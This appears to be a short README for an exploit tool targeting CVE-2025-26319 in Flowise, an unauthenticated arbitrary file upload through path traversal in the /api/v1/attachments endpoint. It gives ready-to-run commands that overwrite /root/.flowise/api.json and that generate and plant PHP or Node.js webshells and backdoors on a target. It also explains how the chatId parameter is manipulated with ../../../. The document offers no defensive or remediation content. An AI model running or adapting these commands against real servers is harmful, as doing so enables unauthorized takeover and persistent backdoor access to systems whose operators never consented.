
Exploit for CVE-2025-26319 targeting Flowise's /api/v1/attachments endpoint, enabling unauthenticated arbitrary file upload and webshell generation via path traversal.
python flowise_exploit.py -u http://target:3000 -f new_api.json -d /root/.flowise/api.json 3. Auto-generate and Upload Webshell
python flowise_exploit.py -u http://target:3000 --generate-webshell php --webshell-path /var/www/html/shell.php
python flowise_exploit.py -u http://target:3000 --generate-webshell nodejs --webshell-path /tmp/backdoor.js
Attack Principle Using the /api/v1/attachments route which is in the whitelist, no authentication required Path traversal by manipulating the chatId parameter (../../../) Upload arbitrary files to any location on the server file system